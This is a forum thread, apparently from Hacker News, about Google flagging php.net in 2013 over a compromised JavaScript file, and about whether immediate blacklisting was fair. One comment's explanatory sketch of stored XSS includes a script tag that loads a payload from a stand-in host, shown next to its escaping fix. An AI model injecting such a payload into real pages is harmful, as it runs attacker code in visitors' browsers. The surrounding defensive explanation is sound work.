I work at Google and was the one who posted on our forums about this.
What our systems found was definitely a compromised JS file, and others on this thread have posted something similar to what we saw. This is not a false positive.
We have detailed help for webmasters in this kind of situation: http://www.google.com/webmasters/hacked/
One thing that I strongly suggest to any webmaster in this situation is to look for the server vulnerability that allowed this file to be compromised in the first place. We sometimes see webmasters simply fix the affected files without digging into the security hole that allowed the hack, which leaves the server vulnerable to repeat attacks.
Happy to answer questions.
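Edit: one quick way to find tampered files, assuming you kept known-good checksums from a clean deploy (the manifest name and format below are hypothetical), is to compare hashes. A minimal sketch in Python:

    # Sketch: flag files whose checksums differ from a known-good manifest.
    # Assumes "manifest.sha256" lines look like "<hex digest>  <path>".
    import hashlib

    def sha256(path):
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(8192), b""):
                h.update(chunk)
        return h.hexdigest()

    with open("manifest.sha256") as manifest:
        for line in manifest:
            if not line.strip():
                continue
            digest, path = line.split(None, 1)
            path = path.strip()
            if sha256(path) != digest:
                print("MODIFIED:", path)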
php.net allows users to post answers and examples of code throughout the website. It's likely that one of the submission forms has (or had) a hole that allowed someone to submit or alter actual JS code; see the hypothetical sketch below for the class of hole I mean.
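A hypothetical illustration of that class of hole (stored XSS via an unescaped submission; this is not php.net's actual code):

    # Hypothetical: a user-submitted note containing script.
    import html

    user_note = '<script src="//evil.example/payload.js"></script>'

    # Unsafe: raw interpolation means the submitted JS runs in every visitor's browser.
    unsafe_page = "<div class='note'>" + user_note + "</div>"

    # Safer: escape HTML metacharacters so the submission renders as text, not code.
    safe_page = "<div class='note'>" + html.escape(user_note) + "</div>"
    print(safe_page)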
Thanks for the information. Can you confirm how long the malware was on the site, and whether it's possible that people were drive-by'd before you flagged the domain? Also, what systems did the malware target?
It's a pity you don't disclose which malware specifically the sites were distributing. As a user who may have been affected prior to Google flagging it, it's frustrating to have no information on what to look for.
When I go to that page I see: "Of the 1838 pages we tested on the site over the past 90 days, 4 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2013-10-24, and the last time suspicious content was found on this site was on 2013-10-23."
As a student interested in security, will the JS file be made available so those of us without privileged access can examine it and learn how this was done?
EDIT
Okay, looks like Safe Browsing says it is no longer suspicious. And I think someone already provided the JS file below.
Google's Safe Browsing looks pretty cool! Really powerful infrastructure. I wonder whether it's integrated with VirusTotal?
Can VirusTotal recognize this?
Another thing is that other search engines don't seem to have this built in. I wonder whether people using DDG will ever think about querying Google Safe Browsing.
Does Google provide an API (besides just querying Safe Browsing directly)?
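Edit: there is one, the Safe Browsing Lookup API. A minimal sketch against the current v4 threatMatches:find endpoint, assuming you have a valid API key (the key and client values below are placeholders):

    # Sketch: look up a URL against Google Safe Browsing (v4 Lookup API).
    # API_KEY is a placeholder; get a real key from the Google developer console.
    import json
    import urllib.request

    API_KEY = "YOUR_API_KEY"
    ENDPOINT = ("https://safebrowsing.googleapis.com/v4/"
                "threatMatches:find?key=" + API_KEY)

    body = {
        "client": {"clientId": "example-client", "clientVersion": "1.0"},
        "threatInfo": {
            "threatTypes": ["MALWARE", "SOCIAL_ENGINEERING"],
            "platformTypes": ["ANY_PLATFORM"],
            "threatEntryTypes": ["URL"],
            "threatEntries": [{"url": "http://php.net/"}],
        },
    }

    req = urllib.request.Request(
        ENDPOINT,
        data=json.dumps(body).encode("utf-8"),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        result = json.loads(resp.read().decode("utf-8"))
        # An empty object means no matches; otherwise "matches" lists threats.
        print(result.get("matches", "no threats found"))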
I don't understand: you guys CLEARLY have the information on what, specifically, is causing the problem (which JS file, in this case). Yet for the site owner, you don't make it available? Or if it is, it's not at all easy to find the information. It's just this black box "go figure it out yourself" thing. Meanwhile you've essentially killed access to their site. Or is there something I'm missing?
But wasn't that only after rasmus posted about it on Twitter? And how would that have worked out for someone not running such a high profile site as him?
Once you're a confirmed webmaster for a given site, Google provides you with access to exactly which files are infected on your site. Providing that information publicly would open the site up to further exploitation.
There are huge repercussions for any website that gets blacklisted with the Stop Badware clearinghouse, not the least of which is the inability to figure out exactly where the problem actually is, because your company's information for a webmaster trying to resolve the problem is ridiculously minimal. There are no notifications (unless you are signed up for Google Webmaster Tools), and restoring a website to normal globally can take anywhere from 48 hours to two weeks. There are millions of developers who rely on the PHP website daily to perform their day jobs, and you've now made it that much harder for us to do our jobs.
Stop Badware needs a serious overhaul. At the very least, they should contact the addresses in the WHOIS record for the domain BEFORE doing anything. Give the website owners 24 hours to resolve the issue before blacklisting the site, and give them a heck of a lot more information to go on than some vague text.
Also, there are several anti-virus vendors out there who use the clearinghouse database for their products... 6 to 12 months after the original blacklisting. So this will happen all over again 6 to 12 months from now. Finding contacts at anti-virus vendors to get domain blocks removed is a lot harder than getting removed from the blacklist on the Stop Badware site.
The CORRECT solution for this situation was to find a contact at PHP who could resolve the issue quickly and amicably. Seriously, how hard is it to locate Rasmus' e-mail address? Always try to find a human contact before using Stop Badware. You can chalk up using Stop Badware for the PHP website as the dumbest decision you've made this year. Hopefully this decision of yours will raise the ire of the Internet just enough to force the company you work for to revamp Stop Badware so it doesn't suck, Google Webmaster Tools so they don't suck, and the reporting tools for sending information to Stop Badware so they also don't suck.
> Stop Badware needs a serious overhaul. At the very least, they should contact the addresses in the WHOIS record for the domain BEFORE doing anything.
Why? This isn't a responsible disclosure, "we found a potential vulnerability but we don't know if it's being exploited yet" kind of situation. This is a "there's a real threat to anyone visiting that site via your search engine right now" kind of situation.
As a user, I'd be much happier if the search engine flagged this immediately.
As a site owner, if someone found malware on my site I'd want to know ASAP too. Obviously it would be helpful if they sent me a notification and made the specific details of the identified threat available. However, I could hardly criticise them for blacklisting my site while it should be blacklisted, or for claiming that we were dangerous while we were actually serving malware.
Not clearing up the blacklists promptly after the threat is identified and removed is an entirely different question. If you're going to go around blacklisting sites then I think you also have a responsibility (and, for that matter, you should also have a legal obligation) to remove them from the blacklist with similar efficiency if you're notified that the threat has been removed. Claiming that someone's site is dangerous when it isn't is defamatory, and should be treated as such.
Google is not doing this as a service to the website, they are doing it as a service to the user. Giving the owner some kind of grace period to fix the issue could mean hundreds of thousands of people could get hit with a malicious script in the meantime.
If Google waited 24 hours before blacklisting a site, how many people would be infected during the grace period?
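Back-of-envelope, with assumed numbers (neither php.net's real traffic nor the exploit success rate is public in this thread):

    # Hypothetical exposure during a 24-hour grace period.
    daily_visits = 1_000_000  # assumption: visits to the site per day
    exploit_rate = 0.01       # assumption: fraction of visitors with a vulnerable browser/plugin
    print(int(daily_visits * exploit_rate), "potential infections per day of delay")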
It's incorrect to say that Google doesn't attempt to contact the site owner. According to the Webmaster Tools support site [0], Google will send notices to several common email addresses when it blacklists a site.
> Seriously, how hard is it to locate Rasmus' e-mail address?
Why should Google do that? Because it's Rasmus? They don't have to do that, period.
The CORRECT SOLUTION is to protect users FIRST and not allow the site to infect more computers.
IT IS NOT Google's responsibility to warn webmasters that their sites are infected (though they can be warned by email automatically).
IT IS the webmaster's responsibility to audit his website's security, which obviously did not happen with php.net. If they get punished for that, that's FAIR, because it will force them to take security more seriously.
[edit]
It's high time people moved from httpd to something else like nginx; httpd is insecure by default, and this is not how you deal with security. As for PHP, since it doesn't promote any good security practices by default, it should be avoided.
Are you seriously suggesting that Google should not immediately block a website when they detect malware on it... because millions of people are using that site?
I don't understand your suggestion that Google should have waited to protect their users from a site that is serving malware. Why would that be a good idea?